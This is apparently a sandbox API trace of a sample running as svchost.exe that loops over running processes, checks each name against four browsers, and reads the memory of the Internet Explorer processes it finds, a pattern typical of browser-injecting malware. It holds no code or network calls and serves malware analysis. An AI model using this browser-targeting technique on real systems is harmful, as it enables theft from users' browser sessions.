	[0226.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5f20
	[0226.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.883] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0226.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.884] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.884] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0226.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.885] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.885] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0226.886] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5f24
	[0226.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.886] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0226.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.886] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.887] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0226.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.888] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.888] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0226.888] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5f28
	[0226.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.889] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0226.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.889] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.889] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0226.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.889] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.890] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0226.891] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5f2c
	[0226.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.891] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0226.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.891] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.892] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0226.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.892] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.892] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0226.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5f30
	[0226.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.893] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0226.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.894] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.895] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0226.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.895] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.896] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0226.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5f34
	[0226.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.897] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0226.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.897] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.898] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0226.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.898] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.899] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0226.899] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5f38
	[0226.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.899] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0226.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.900] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.901] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0226.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.901] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.902] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0226.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5f3c
	[0226.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.904] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0226.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.904] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.905] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0226.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.905] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.906] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0226.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5f40
	[0226.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.907] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0226.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.907] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0226.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.907] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0226.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.908] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.908] NtQueryInformationProcess (in: ProcessHandle=0x5f40, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0226.908] ReadProcessMemory (in: hProcess=0x5f40, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0226.908] ReadProcessMemory (in: hProcess=0x5f40, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0226.908] ReadProcessMemory (in: hProcess=0x5f40, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0226.908] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0226.909] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0226.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5f44
	[0226.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.910] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0226.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.910] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0226.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.910] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0226.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.910] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.911] NtQueryInformationProcess (in: ProcessHandle=0x5f44, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0226.911] ReadProcessMemory (in: hProcess=0x5f44, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0226.911] ReadProcessMemory (in: hProcess=0x5f44, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0226.911] ReadProcessMemory (in: hProcess=0x5f44, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0226.911] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0226.911] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0226.912] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5f48
	[0226.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.912] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0226.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.913] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.913] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0226.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.913] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.913] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0226.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5f4c
	[0226.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.914] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0226.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.915] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.915] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0226.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.915] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.916] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5f50
	[0226.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.917] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.917] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.917] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.918] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.918] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.919] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5f54
	[0226.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.920] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.920] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.920] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.921] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.921] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x5f58
	[0226.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.922] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.922] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.923] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.923] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.923] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0226.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5f5c
	[0226.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.924] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0226.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.924] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.925] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0226.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.925] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.925] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0226.926] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x5f60
	[0226.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.926] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.927] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.927] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.927] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.928] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.928] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x5f64
	[0226.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.928] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.929] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.929] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.929] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.930] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0226.930] CloseHandle (hObject=0x4fd0) returned 1
	[0226.930] Sleep (dwMilliseconds=0x64) 
	[0227.029] GetCurrentProcessId () returned 0x110
	[0227.029] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0227.036] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0227.038] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0227.041] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0227.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5f68
	[0227.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.042] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.042] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.043] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.043] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.043] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0227.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5f6c
	[0227.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.044] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.044] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.045] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.045] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.045] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0227.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x5f70
	[0227.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.046] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0227.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.047] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.047] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0227.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.047] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.048] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0227.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x5f74
	[0227.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.049] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.049] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
